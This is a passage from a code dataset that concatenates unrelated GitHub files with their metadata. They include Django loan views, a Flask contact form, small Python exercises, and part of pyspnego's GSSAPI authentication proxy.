request.GET.get(\"end_date\", None)\n amount = request.GET.get(\"amount\", None)\n product_name = request.GET.get(\"product_name\", None)\n\n clients = Client.objects.get(user_id=request.session[\"user_id\"])\n\n loan_length = 0\n\n context = {\n \"clients\": clients,\n }\n\n if user_id:\n context[\"user_id\"] = int(user_id)\n client = Client.objects.get(user_id=user_id)\n context[\"client\"] = client\n credit = CreditScore.objects.get(client_id=user_id)\n context[\"credit\"] = credit\n\n if credit.score > 700:\n context[\"interest\"] = 7\n elif credit.score > 500:\n context[\"interest\"] = 10\n elif credit.score > 400:\n context[\"interest\"] = 12\n elif credit.score > 300:\n context[\"interest\"] = 15\n\n if product_name:\n context[\"product_name\"] = product_name\n\n if start_date:\n context[\"start_date\"] = start_date\n\n if end_date:\n context[\"end_date\"] = end_date\n\n if start_date and end_date:\n # dd/mm/YY\n start_date = datetime.strptime(start_date, \"%Y-%m-%d\")\n end_date = datetime.strptime(end_date, \"%Y-%m-%d\")\n loan_length = (end_date - start_date).days // 30\n context[\"loan_length\"] = loan_length\n\n if amount:\n context[\"amount\"] = amount\n context[\"amount_to_pay\"] = int(amount) + (int(amount) * (context[\"interest\"] / 100) * (loan_length / 12))\n\n return render(request, \"client_apply.html\", context)\n\n def post(self, request, client_id):\n user_id = request.POST[\"user_id\"]\n start_date = request.POST[\"start_date\"]\n end_date = request.POST[\"end_date\"]\n product_name = request.POST[\"product_name\"]\n loan_length = request.POST[\"loan_length\"]\n amount = request.POST[\"amount\"]\n amount_to_pay = request.POST[\"amount_to_pay\"]\n interest = request.POST[\"interest\"]\n\n loan = Loan(\n client_id=user_id,\n product_name=product_name,\n start_date=start_date,\n end_date=end_date,\n amount=amount,\n amount_to_pay=float(amount_to_pay),\n loan_length=loan_length,\n interest_rate=interest,\n status=\"Pending\",\n )\n\n loan.save()\n print(loan)\n\n return redirect(\"/client\" + str(loan.loan_id))\n\n\nclass PaymentView(View):\n def get(self, request, payment_id):\n # Pay loan\n payment = Payment.objects.get(payment_id=payment_id)\n payment.status = \"Paid\"\n payment.date_paid = datetime.today()\n payment.is_late = payment.date_paid.date() > payment.due_date\n\n payment.save()\n\n return redirect(request.META.get('HTTP_REFERER'))\n\n\nclass ViewLoanView(View):\n def get(self, request, loan_id):\n try:\n loan = Loan.objects.get(loan_id=loan_id)\n payments = Payment.objects.filter(loan_id=loan_id)\n client = Client.objects.get(user_id=loan.client.user_id)\n\n # payments = list(payments).sort(key=lambda r: r.due_date)\n\n current_outstanding = 0\n for p in payments:\n if p.status == \"Pending\":\n current_outstanding += p.amount\n\n context = {\n \"loan\": loan,\n \"client\": client,\n \"payments\": payments,\n \"current_outstanding\": current_outstanding\n }\n\n return render(request, \"view_loan.html\", context)\n except Loan.DoesNotExist:\n return redirect(\"/client/\")\n","repo_name":"ggonzaga29/qwarta","sub_path":"client_dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38994436677","text":"#Nueva clase\r\nclass Hotel:\r\n\r\n #Atributos de la instancia\r\n def __init__(self,numero_maximo_de_huespedes,lugares_de_estacionamiento):\r\n self.numero_maximo_de_huespedes=numero_maximo_de_huespedes\r\n self.lugares_de_estacionamiento=lugares_de_estacionamiento\r\n self.huespedes=0\r\n def añadir_huespedes(self,cantidad_huespedes):\r\n self.huespedes+=cantidad_huespedes\r\n\r\n def checkout(self,cantidad_huespedes):\r\n self.huespedes-=cantidad_huespedes\r\n \r\n def ocupacion_total(self):\r\n return self.huespedes\r\n\r\n#Instancia\r\nhotel=Hotel(numero_maximo_de_huespedes=50,lugares_de_estacionamiento=23)\r\nopc=0\r\nwhile opc!=4:\r\n print(\"-------Bienvenido a nuestra cadena de hoteles--------\")\r\n print(\"1.- Entrada de huésped\")\r\n print(\"2.- Salida de huésped\")\r\n print(\"3.- Mostrar huéspedes\")\r\n print(\"4.- Salir\")\r\n opc=int(input('Ingrese una opción del menú: '))\r\n if opc==1 or opc==2:\r\n num_huespedes=int(input(\"Ingrese el número de huéspedes: \"))\r\n if opc==1:\r\n hotel.añadir_huespedes(num_huespedes)\r\n elif opc==2:\r\n hotel.checkout(num_huespedes)\r\n elif opc==3:\r\n print(f'\\nEl hotel tiene una ocupación de {hotel.ocupacion_total()} huéspedes\\n')\r\n else:\r\n break","repo_name":"alejandromarroquin/functionsandalgorithmswithpython","sub_path":"Clases-Atributos.py","file_name":"Clases-Atributos.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20704696278","text":"import sys\nfrom collections import Counter\nfrom operator import itemgetter\nimport pandas\n\n# run as\n# py translate.py csv-file dataset-file\n\ncsv = open(sys.argv[1], \"r\")\n\nKEYS_CSV_PATH = \"keys.csv\"\nDATA_FILE_PATH = \"data_keys.csv\"\n\ndef getKey(filename):\n keys = pandas.read_csv(KEYS_CSV_PATH, dtype={'bwv': object})\n bwv_str = filename.split('\\\\')[-1][:4]\n return keys.loc[keys['bwv'] == bwv_str]['key'].iloc[0]\n\ncontent = []\n\n# clean unnecessary lines\nfor line in csv:\n if \"Note_on_c\" in line:\n fields = line.split(\", \")\n content.append(fields)\n\nnote_freq = [0] * 12\n\n# count each note class \nfor i in range(0, len(content)):\n if content[i][2] == \"Note_on_c\" and int(content[i][5]) != 0:\n note_freq[int(content[i][4]) % 12] += 1\n\n# compute the frequency of each note class\nnote_freq = [el / sum(note_freq) for el in note_freq]\n\nkey = getKey(sys.argv[1])\n\ndata_file = open(DATA_FILE_PATH, \"a\")\ndata_file.write(','.join([str(el) for el in note_freq]) + \",\" + key + \"\\n\")","repo_name":"deliaedumitru/key-detector","sub_path":"calculate-note-weights.py","file_name":"calculate-note-weights.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34245459650","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.base, name=\"base\"), #for base\n path('home', views.home, name=\"home\"), #after login\n path('delete/', views.delete, name=\"delete\"), #when u delete\n \n \n \n \n]","repo_name":"raj26kumar/wishlist","sub_path":"list/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18820827405","text":"class QuizBrain:\r\n def __init__(self, question_list):\r\n self.question_number = 0\r\n self.question_list = question_list\r\n self.current_score = 0\r\n\r\n def still_has_questions(self):\r\n if self.question_number < len(self.question_list):\r\n questions_remaining = True\r\n else:\r\n questions_remaining = False\r\n return questions_remaining\r\n\r\n def next_question(self):\r\n current_question = self.question_list[self.question_number]\r\n self.question_number += 1\r\n answer = input(f\"{self.question_number} {current_question.text} Please entre your answer: \")\r\n self.check_answer(answer, current_question.answer)\r\n\r\n def check_answer(self, user_answer, correct_answer):\r\n if user_answer.lower() == correct_answer.lower():\r\n print(\"correct answer\")\r\n self.current_score += 1\r\n else:\r\n print(f\"That's wrong\")\r\n print(f\"The correct answer was {correct_answer} \")\r\n print(f\"Your current score is: {self.current_score}/{self.question_number}\")\r\n print(\"\\n\")\r\n\r\n def finish_game(self):\r\n print(\"You have completed the quiz\")\r\n print(f\"Your final score was: {self.current_score}/{self.question_number}\")","repo_name":"greenhalghdan/quiz-game-start","sub_path":"quiz_brain.py","file_name":"quiz_brain.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74031732851","text":"from flask import Flask, render_template, request, redirect, url_for, flash, session\nfrom datetime import datetime, date\nimport sys\nimport os\nfrom app import app\nfrom app.forms import ContactForm\nimport json\n# app = Flask(__name__)\nmenu = {'Головна':'/', 'Коротка інформація':'/info', 'Мої досягнення':'/achievement', 'Contact':'/contact'}\ntoday = date.today()\nage = today.year - 2001 - ((today.month, today.day) < (4, 14))\n@app.route('/')\ndef index():\n return render_template('index.html', menu=menu, my_os=os.uname(),\n user_agent=request.headers.get('User-Agent'), version=sys.version,\n time_now=datetime.now().strftime(\"%H:%M\"))\n\n@app.route('/info')\ndef info():\n return render_template('info.html', menu=menu,age=age, month=today.month, day=today.day)\n\n@app.route('/achievement')\ndef achievement():\n return render_template('achievement.html', menu=menu)\n\n@app.route('/contact', methods=[\"GET\", \"POST\"])\ndef contact():\n form = ContactForm()\n cookie_name = session.get(\"name\")\n cookie_email = session.get(\"email\")\n print(cookie_email,cookie_name)\n if request.method == 'POST':\n if cookie_name is None and cookie_email is None: # якщо кукі не встановлено, тобто ми перший раз відкрили сторінку\n if form.validate_on_submit():\n name = form.name.data\n email = form.email.data\n body = form.body.data\n session['name'] = name\n session['email'] = email\n with open('data.txt', 'a') as outfile:\n json.dump({'name': session.get(\"name\"), 'email': session.get(\"email\"), 'body': body}, outfile)\n outfile.write('\\n')\n flash(message='Повідомлення надіслано успішно!')\n return redirect(url_for('contact'))\n else:\n flash(message='Помилка відправки повідомлення!')\n else: # якщо вхід на сторіку здійснено повторно\n form.name.data = cookie_name # встановлюємо значення для форми name та email\n form.email.data = cookie_email\n if form.validate_on_submit():\n body = form.body.data\n with open('data.txt', 'a') as outfile:\n json.dump({'name': session.get(\"name\"), 'email': session.get(\"email\"), 'body': body}, outfile)\n outfile.write('\\n')\n flash(message='Повідомлення надіслано успішно!')\n return redirect(url_for('contact'))\n else:\n flash(message='Помилка відправки повідомлення!')\n return render_template('contact_form.html', menu=menu, form=form, cookie_name=session.get(\"name\"), cookie_email=session.get(\"email\"))","repo_name":"dima-yurchuk/web_programming_python","sub_path":"portfolio_wtf_form/app/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":3006,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14203092792","text":"from factorial import factorial\r\nfrom randkey import randomkey\r\nn=randomkey()\r\nrandslist=[]\r\ni=factorial(26)\r\nf=open('list.txt','w')\r\nf.write(\"************\")\r\nf.write(\"$\")\r\nf.write(n)\r\nf.write(\"$***********\\n the keys are\\n\")\r\nwhile i>0:\r\n\tj=randomkey()\r\n\trandslist.append(j)\r\n\tprint(i)\r\n\tf.write(j)\r\n\tf.write('\\n')\r\n\tif n in randslist:\r\n\t\tbreak\r\n\t\r\n\ti=i-1\r\nf.close()\r\nif n in randskey:\r\n\tm=randskey.count(n)\r\n\tprint(m)\r\ninput(' ')\r\ninput(' ')","repo_name":"harishpichukala/mycrypt","sub_path":"historical/substitution/cryptanasisofrandkey.py","file_name":"cryptanasisofrandkey.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"32416402138","text":"from __future__ import (absolute_import, division, print_function)\n__metaclass__ = type # noqa (fixes E402 for the imports below)\n\nimport base64\nimport contextlib\nimport logging\nimport os\nimport sys\nimport tempfile\n\nfrom spnego._compat import (\n Generator,\n List,\n Optional,\n Tuple,\n reraise,\n)\n\nfrom spnego._context import (\n ContextProxy,\n ContextReq,\n GSSMech,\n IOVWrapResult,\n IOVUnwrapResult,\n UnwrapResult,\n WinRMWrapResult,\n WrapResult,\n wrap_system_error,\n)\n\nfrom spnego._text import (\n text_type,\n to_bytes,\n to_text,\n)\n\nfrom spnego.exceptions import (\n GSSError as NativeError,\n NegotiateOptions,\n SpnegoError,\n)\n\nfrom spnego.iov import (\n BufferType,\n IOVBuffer,\n)\n\n\nlog = logging.getLogger(__name__)\n\nHAS_GSSAPI = True\nGSSAPI_IMP_ERR = None\ntry:\n import gssapi\n\n from gssapi.raw import (\n acquire_cred_with_password,\n ChannelBindings,\n exceptions as gss_errors,\n GSSError,\n inquire_sec_context_by_oid,\n set_sec_context_option,\n )\nexcept ImportError:\n GSSAPI_IMP_ERR = sys.exc_info()\n HAS_GSSAPI = False\n log.debug(\"Python gssapi not available, cannot use any GSSAPIProxy protocols: %s\" % str(GSSAPI_IMP_ERR[1]))\n\n\nHAS_IOV = True\nGSSAPI_IOV_IMP_ERR = None\ntry:\n from gssapi.raw import (\n IOV,\n IOVBufferType,\n unwrap_iov,\n wrap_iov,\n )\nexcept ImportError as err:\n GSSAPI_IOV_IMP_ERR = sys.exc_info()\n HAS_IOV = False\n log.debug(\"Python gssapi IOV extension not available: %s\" % str(GSSAPI_IOV_IMP_ERR[1]))\n\n_GSS_C_INQ_SSPI_SESSION_KEY = \"1.2.840.113554.1.2.2.5.5\"\n\n# https://github.com/simo5/gss-ntlmssp/blob/bfc7232dbb2259072a976fc9cdb6ae4bfd323304/src/gssapi_ntlmssp.h#L68\n_GSS_NTLMSSP_RESET_CRYPTO_OID = '1.3.6.1.4.1.7165.655.1.3'\n\n# https://github.com/krb5/krb5/blob/master/src/lib/gssapi/spnego/spnego_mech.c#L483\n_GSS_SPNEGO_REQUIRE_MIC_OID_STRING = '1.3.6.1.4.1.7165.655.1.2'\n\n\ndef _available_protocols(options=None): # type: (Optional[NegotiateOptions]) -> List[str, ...]\n \"\"\" Return a list of protocols that GSSAPIProxy can offer. \"\"\"\n if not options:\n options = NegotiateOptions(0)\n\n protocols = []\n if HAS_GSSAPI:\n # We can't offer Kerberos if the caller requires WinRM wrapping and IOV isn't available.\n if not (options & NegotiateOptions.wrapping_winrm and not HAS_IOV):\n protocols = ['kerberos']\n\n # We can only offer NTLM if the mech is installed and can retrieve the functionality the caller desires.\n if _gss_ntlmssp_available(session_key=bool(options & NegotiateOptions.session_key)):\n protocols.append('ntlm')\n\n # We can only offer Negotiate if we can offer both Kerberos and NTLM.\n if len(protocols) == 2:\n protocols.append('negotiate')\n\n return protocols\n\n\ndef _create_iov_result(iov): # type: (IOV) -> Tuple[IOVBuffer, ...]\n \"\"\" Converts GSSAPI IOV buffer to generic IOVBuffer result. \"\"\"\n buffers = []\n for i in iov:\n buffer_entry = IOVBuffer(type=BufferType(i.type), data=i.value)\n buffers.append(buffer_entry)\n\n return tuple(buffers)\n\n\n@contextlib.contextmanager\ndef _env_path(name, value, default_value): # type: (str, str, str) -> Generator[None, None, None]\n \"\"\" Adds a value to a PATH-like env var and preserve the existing value if present. \"\"\"\n orig_value = os.environ.get(name, None)\n os.environ[name] = '%s:%s' % (value, orig_value or default_value)\n try:\n yield\n\n finally:\n if orig_value:\n os.environ[name] = orig_value\n\n else:\n del os.environ[name]\n\n\n@contextlib.contextmanager\ndef _krb5_conf(forwardable=False): # type: (bool) -> Generator[None, None, None]\n \"\"\" Runs with a custom krb5.conf file that extends the existing config if present. \"\"\"\n if forwardable:\n with tempfile.NamedTemporaryFile() as temp_cfg:\n temp_cfg.write(b\"[libdefaults]\\nforwardable = true\\n\")\n temp_cfg.flush()\n\n with _env_path('KRB5_CONFIG', temp_cfg.name, '/etc/krb5.conf'):\n yield\n\n return\n\n yield\n\n\ndef _get_gssapi_credential(mech, usage, username=None, password=None, context_req=None):\n # type: (gssapi.OID, str, Optional[text_type], Optional[text_type]) -> gssapi.creds.Credentials\n \"\"\"Gets a set of credential(s).\n\n Will get a set of GSSAPI credential(s) for the mech specified. If the username and password is specified then a new\n set of credentials are explicitly required for the mech specified. Otherwise the credentials are retrieved by the\n cache as defined by the mech.\n\n The behaviour of this function is highly dependent on the GSSAPI implementation installed as well as what NTLM mech\n is available. Here are some of the known behaviours of each mech.\n\n Kerberos:\n Works for any GSSAPI implementation. The cache is the CCACHE which can be managed with `kinit`.\n\n NTLM:\n Only works with MIT krb5 and requires `gss-ntlmssp`_ to be installed. The cache that this mech uses is either\n a plaintext file specified by `NTLM_USER_FILE` in the format `DOMAIN:USERNAME:PASSWORD` or\n `:USER_UPN@REALM:PASSWORD` or it can be configured with winbind to a standalone Samba setup or with AD.\n\n SPNEGO:\n To work properly it requires both Kerberos and NTLM to be available where the latter only works with MIT krb5,\n see `NTLM` for more details. It attempts to get a credential for the all the mechs that SPNEGO supports so it\n will retrieve a Kerberos cred then NTLM.\n\n Args:\n mech: The mech OID to get the credentials for.\n usage: Either `initiate` for a client context or `accept` for a server context.\n username: The username to get the credentials for, if omitted then the default user is gotten from the cache.\n password: The password for the user, if omitted then the cached credentials is retrieved.\n\n Returns:\n gssapi.creds.Credentials: The credential set that was created/retrieved.\n\n .. _gss-ntlmssp:\n https://github.com/gssapi/gss-ntlmssp\n \"\"\"\n if username:\n name_type = getattr(gssapi.NameType, 'user' if usage == 'initiate' else 'hostbased_service')\n username = gssapi.Name(base=username, name_type=name_type)\n\n if username and password:\n # NOTE: MIT krb5 < 1.14 would store this cred in the global cache but later versions used a private cache in\n # memory. There's not much we can do about this but document this behaviour and hope people upgrade to a newer\n # version.\n # GSSAPI offers no way to specify custom flags like forwardable. We use a temp conf file to ensure an explicit\n # cred with the delegate flag will actually be forwardable.\n forwardable = False\n forwardable_mechs = [gssapi.OID.from_int_seq(GSSMech.kerberos.value),\n gssapi.OID.from_int_seq(GSSMech.spnego.value)]\n if context_req and context_req & ContextReq.delegate and mech in forwardable_mechs:\n forwardable = True\n\n with _krb5_conf(forwardable=forwardable):\n cred = acquire_cred_with_password(username, to_bytes(password), usage=usage, mechs=[mech])\n\n return cred.creds\n\n cred = gssapi.Credentials(name=username, usage=usage, mechs=[mech])\n\n # We don't need to check the actual lifetime, just trying to get the valid will have gssapi check the lifetime and\n # raise an ExpiredCredentialsError if it is expired.\n _ = cred.lifetime\n\n return cred\n\n\ndef _gss_ntlmssp_available(session_key=False): # type: (bool) -> bool\n \"\"\"Determine if NTLM is available through GSSAPI.\n\n NTLM support through GSSAPI is a complicated story. Because we rely on NTLM being available for SPNEGO fallback\n when Kerberos doesn't work we need to make sure the currently installed provider will give us what we need.\n\n Here is the current lay of the land for each GSSAPI provider.\n\n MIT KRB5:\n MIT KRB5 does not have NTLM builtin but it can be added with the `gss-ntlmssp`_ provider. We check to make sure\n the NTLM mech is installed and implements the required functions that are needed for SPNEGO support.\n\n The `gss-ntlmssp`_ provider only recently added support for retrieving its session key in v0.9.0. Not all\n callers need this behaviour so the `session_key` arg can be used to do a further check on that if needed.\n\n Heimdal:\n There are 2 major variants for Heimdal; 1. macOS' implementation, and 2. the actual Heimdal distribution. Each\n build has builtin \"support\" for NTLM but so far they are not usable for this library because:\n\n * macOS' implementation doesn't produce valid tokens, they are rejected by the server.\n * Pure Heimdal `gss_acquire_cred_with_password` isn't implemented for NTLM, no explicit creds.\n * Doesn't seem to produce a NTLM v2 message so the strength is even less than what our Python impl can offer.\n * It is doubtful it implements the required functions that MIT KRB5 relies on to get SPNEGO working.\n\n Because of these reasons we don't consider NTLM usable through GSSAPI on Heimdal based setups.\n\n Args:\n session_key: Whether the caller will want access to the session key of the context.\n\n Returns:\n bool: Whether NTLM is available to use (True) or not (False).\n\n .. _gss-ntlmssp:\n https://github.com/gssapi/gss-ntlmssp\n \"\"\"\n # Cache the result so we don't run this check multiple times.\n try:\n res = _gss_ntlmssp_available.result\n return res['session_key'] if session_key else res['available']\n except AttributeError:\n pass\n\n ntlm_features = {\n 'available': False,\n 'session_key': False,\n }\n\n # If any of these calls results in a GSSError we treat that as NTLM being unusable because these are standard\n # behaviours we expect to work.\n ntlm = gssapi.OID.from_int_seq(GSSMech.ntlm.value)\n try:\n # This can be anything, the first NTLM message doesn't need a valid target name or credential.\n spn = gssapi.Name('http@test', name_type=gssapi.NameType.hostbased_service)\n cred = _get_gssapi_credential(ntlm, 'initiate', username='user', password='pass')\n context = gssapi.SecurityContext(creds=cred, usage='initiate', name=spn, mech=ntlm)\n\n context.step() # Need to at least have a context set up before we can call gss_set_sec_context_option.\n\n # macOS' Heimdal implementation will work up to this point but the end messages aren't actually valid. Luckily\n # it does not implement 'GSS_NTLMSSP_RESET_CRYPTO_OID' so by running this we can weed out that broken impl.\n _gss_ntlmssp_reset_crypto(context)\n\n ntlm_features['available'] = True\n except GSSError as gss_err:\n log.debug(\"GSSAPI does not support required the NTLM interfaces: %s\" % str(gss_err))\n else:\n # gss-ntlmssp only recently added support for GSS_C_INQ_SSPI_SESSION_KEY in v0.9.0, we check if it is present\n # before declaring session_key support is there as it might control whether it is used or not.\n # https://github.com/gssapi/gss-ntlmssp/issues/10\n try:\n inquire_sec_context_by_oid(context, gssapi.OID.from_int_seq(_GSS_C_INQ_SSPI_SESSION_KEY))\n except gss_errors.OperationUnavailableError as o_err:\n # (GSS_S_UNAVAILABLE | ERR_NOTAVAIL) is raised when ntlmssp does support GSS_C_INQ_SSPI_SESSION key but\n # the context is not yet established. Any other errors would mean this isn't supported and we can't use\n # the current version installed if we need session_key interrogation.\n # https://github.com/gssapi/gss-ntlmssp/blob/9d7a275a4d6494606fb54713876e4f5cbf4d1362/src/gss_sec_ctx.c#L1277\n if getattr(o_err, 'min_code', 0) == 1314127894: # ERR_NOTAVAIL\n ntlm_features['session_key'] = True\n\n else:\n log.debug(\"GSSAPI ntlmssp does not support session key interrogation: %s\" % str(o_err))\n\n _gss_ntlmssp_available.result = ntlm_features\n return _gss_ntlmssp_available(session_key=session_key)\n\n\ndef _gss_ntlmssp_reset_crypto(context, outgoing=True): # type: (gssapi.SecurityContext, bool) -> None\n \"\"\" Resets the NTLM RC4 ciphers when being used with SPNEGO. \"\"\"\n reset_crypto = gssapi.OID.from_int_seq(_GSS_NTLMSSP_RESET_CRYPTO_OID)\n value = b\"\\x00\\x00\\x00\\x00\" if outgoing else b\"\\x01\\x00\\x00\\x00\"\n set_sec_context_option(reset_crypto, context=context, value=value)\n\n\ndef _gss_sasl_description(mech): # type: (gssapi.OID) -> Optional[bytes]\n \"\"\" Attempts to get the SASL description of the mech specified. \"\"\"\n try:\n res = _gss_sasl_description.result\n return res[mech.dotted_form]\n\n except (AttributeError, KeyError):\n res = getattr(_gss_sasl_description, 'result', {})\n\n try:\n sasl_desc = gssapi.raw.inquire_saslname_for_mech(mech).mech_description\n except Exception as e:\n log.debug(\"gss_inquire_saslname_for_mech(%s) failed: %s\" % (mech.dotted_form, str(e)))\n sasl_desc = None\n\n res[mech.dotted_form] = sasl_desc\n _gss_sasl_description.result = res\n return _gss_sasl_description(mech)\n\n\nclass GSSAPIProxy(ContextProxy):\n \"\"\"GSSAPI proxy class for GSSAPI on Linux.\n\n This proxy class for GSSAPI exposes GSSAPI calls into a common interface for SPNEGO authentication. This context\n uses the Python gssapi library to interface with the gss_* calls to provider Kerberos, and potentially native\n ntlm/negotiate functionality.\n \"\"\"\n def __init__(self, username=None, password=None, hostname=None, service=None, channel_bindings=None,\n context_req=ContextReq.default, usage='initiate', protocol='negotiate', options=0, _is_wrapped=False):\n\n if not HAS_GSSAPI:\n reraise(ImportError(\"GSSAPIProxy requires the Python gssapi library\"), GSSAPI_IMP_ERR)\n\n super(GSSAPIProxy, self).__init__(username, password, hostname, service, channel_bindings, context_req, usage,\n protocol, options, _is_wrapped)\n\n mech_str = {\n 'kerberos': GSSMech.kerberos.value,\n 'negotiate': GSSMech.spnego.value,\n 'ntlm': GSSMech.ntlm.value,\n }[self.protocol]\n mech = gssapi.OID.from_int_seq(mech_str)\n\n cred = None\n try:\n cred = _get_gssapi_credential(mech, self.usage, username=username, password=password,\n context_req=context_req)\n except GSSError as gss_err:\n reraise(SpnegoError(base_error=gss_err, context_msg=\"Getting GSSAPI credential\"))\n\n context_kwargs = {}\n\n if self.channel_bindings:\n context_kwargs['channel_bindings'] = ChannelBindings(\n initiator_address_type=self.channel_bindings.initiator_addrtype,\n initiator_address=self.channel_bindings.initiator_address,\n acceptor_address_type=self.channel_bindings.acceptor_addrtype,\n acceptor_address=self.channel_bindings.acceptor_address,\n application_data=self.channel_bindings.application_data\n )\n\n if self.usage == 'initiate':\n spn = to_text(\"%s@%s\" % (service.lower() if service else 'host', hostname or 'unspecified'))\n context_kwargs['name'] = gssapi.Name(spn, name_type=gssapi.NameType.hostbased_service)\n context_kwargs['mech'] = mech\n context_kwargs['flags'] = self._context_req\n\n self._context = gssapi.SecurityContext(creds=cred, usage=self.usage, **context_kwargs)\n\n @classmethod\n def available_protocols(cls, options=None):\n return _available_protocols(options=options)\n\n @classmethod\n def iov_available(cls):\n # NOTE: Even if the IOV headers are unavailable, if NTLM was negotiated then IOV won't work. Unfortunately we\n # cannot determine that here as we may not know the protocol until after negotiation.\n return HAS_IOV\n\n @property\n def client_principal(self):\n if self.usage == 'accept':\n # Looks like a bug in python-gssapi where the value still has the terminating null char.\n return to_text(self._context.initiator_name).rstrip(u'\\x00')\n\n @property\n def complete(self):\n return self._context.complete\n\n @property\n def negotiated_protocol(self):\n try:\n # For an acceptor this can be blank until the first token is received\n oid = self._context.mech.dotted_form\n except AttributeError:\n return\n\n return {\n GSSMech.kerberos.value: 'kerberos',\n GSSMech.ntlm.value: 'ntlm',\n\n # Only set until the negotiate process is complete, will change to one of the above once the context is\n # set up.\n GSSMech.spnego.value: 'negotiate',\n }.get(oid, 'unknown: %s' % self._context.mech.dotted_form)\n\n @property\n @wrap_system_error(NativeError, \"Retrieving session key\")\n def session_key(self):\n return inquire_sec_context_by_oid(self._context, gssapi.OID.from_int_seq(_GSS_C_INQ_SSPI_SESSION_KEY))[0]\n\n @wrap_system_error(NativeError, \"Processing security token\")\n def step(self, in_token=None):\n if not self._is_wrapped:\n log.debug(\"GSSAPI step input: %s\", to_text(base64.b64encode(in_token or b\"\")))\n\n out_token = self._context.step(in_token)\n self._context_attr = int(self._context.actual_flags)\n\n if not self._is_wrapped:\n log.debug(\"GSSAPI step output: %s\", to_text(base64.b64encode(out_token or b\"\")))\n\n return out_token\n\n @wrap_system_error(NativeError, \"Wrapping data\")\n def wrap(self, data, encrypt=True, qop=None):\n res = gssapi.raw.wrap(self._context, data, confidential=encrypt, qop=qop)\n\n # gss-ntlmssp used to hardcode the conf_state=0 which results in encrpted=False. Because we know it is always\n # sealed we just manually set to True.\n # https://github.com/gssapi/gss-ntlmssp/pull/15\n encrypted = True if self.negotiated_protocol == 'ntlm' else res.encrypted\n\n return WrapResult(data=res.message, encrypted=encrypted)\n\n @wrap_system_error(NativeError, \"Wrapping IOV buffer\")\n def wrap_iov(self, iov, encrypt=True, qop=None):\n iov_buffer = IOV(*self._build_iov_list(iov), std_layout=False)\n encrypted = wrap_iov(self._context, iov_buffer, confidential=encrypt, qop=qop)\n\n return IOVWrapResult(buffers=_create_iov_result(iov_buffer), encrypted=encrypted)\n\n def wrap_winrm(self, data):\n if self.negotiated_protocol == 'ntlm':\n # NTLM does not support IOV wrapping, luckily the header is a fixed size so we can split at that.\n wrap_result = self.wrap(data).data\n header = wrap_result[:16]\n enc_data = wrap_result[16:]\n padding = b\"\"\n\n else:\n iov = self.wrap_iov([BufferType.header, data, BufferType.padding]).buffers\n header = iov[0].data\n enc_data = iov[1].data\n padding = iov[2].data or b\"\"\n\n return WinRMWrapResult(header=header, data=enc_data + padding, padding_length=len(padding))\n\n @wrap_system_error(NativeError, \"Unwrapping data\")\n def unwrap(self, data):\n res = gssapi.raw.unwrap(self._context, data)\n\n # See wrap for more info.\n encrypted = True if self.negotiated_protocol == 'ntlm' else res.encrypted\n\n return UnwrapResult(data=res.message, encrypted=encrypted, qop=res.qop)\n\n @wrap_system_error(NativeError, \"Unwrapping IOV buffer\")\n def unwrap_iov(self, iov):\n iov_buffer = IOV(*self._build_iov_list(iov), std_layout=False)\n res = unwrap_iov(self._context, iov_buffer)\n\n return IOVUnwrapResult(buffers=_create_iov_result(iov_buffer), encrypted=res.encrypted, qop=res.qop)\n\n def unwrap_winrm(self, header, data):\n # This is an extremely weird setup, we need to use gss_unwrap for NTLM but for Kerberos it depends on the\n # underlying provider that is used. Right now the proper IOV buffers required to work on both AES and RC4\n # encrypted only works for MIT KRB5 whereas Heimdal fails. It currently mandates a padding buffer of a\n # variable size which we cannot achieve in the way that WinRM encrypts the data. This is fixed in the source\n # code but until it is widely distributed we just need to use a way that is known to just work with AES. To\n # ensure that MIT works on both RC4 and AES we check the description which differs between the 2 implemtations.\n # It's not perfect but I don't know of another way to achieve this until more time has passed.\n # https://github.com/heimdal/heimdal/issues/739\n sasl_desc = _gss_sasl_description(self._context.mech)\n\n # https://github.com/krb5/krb5/blob/f2e28f13156785851819fc74cae52100e0521690/src/lib/gssapi/krb5/gssapi_krb5.c#L686\n if sasl_desc and sasl_desc == b'Kerberos 5 GSS-API Mechanism':\n # TODO: Should done when self.negotiated_protocol == 'kerberos', above explains why this can't be done yet.\n iov = self.unwrap_iov([\n (IOVBufferType.header, header),\n data,\n IOVBufferType.data\n ]).buffers\n return iov[1].data\n\n else:\n return self.unwrap(header + data).data\n\n @wrap_system_error(NativeError, \"Signing message\")\n def sign(self, data, qop=None):\n return gssapi.raw.get_mic(self._context, data, qop=qop)\n\n @wrap_system_error(NativeError, \"Verifying message\")\n def verify(self, data, mic):\n return gssapi.raw.verify_mic(self._context, data, mic)\n\n @property\n def _context_attr_map(self):\n attr_map = [\n (ContextReq.delegate, 'delegate_to_peer'),\n (ContextReq.mutual_auth, 'mutual_authentication'),\n (ContextReq.replay_detect, 'replay_detection'),\n (ContextReq.sequence_detect, 'out_of_sequence_detection'),\n (ContextReq.confidentiality, 'confidentiality'),\n (ContextReq.integrity, 'integrity'),\n\n # Only present when the DCE extensions are installed.\n (ContextReq.identify, 'identify'),\n\n # Only present with newer versions of python-gssapi https://github.com/pythongssapi/python-gssapi/pull/218.\n (ContextReq.delegate_policy, 'ok_as_delegate'),\n ]\n attrs = []\n for spnego_flag, gssapi_name in attr_map:\n if hasattr(gssapi.RequirementFlag, gssapi_name):\n attrs.append((spnego_flag, getattr(gssapi.RequirementFlag, gssapi_name)))\n\n return attrs\n\n @property\n def _requires_mech_list_mic(self):\n try:\n require_mic = 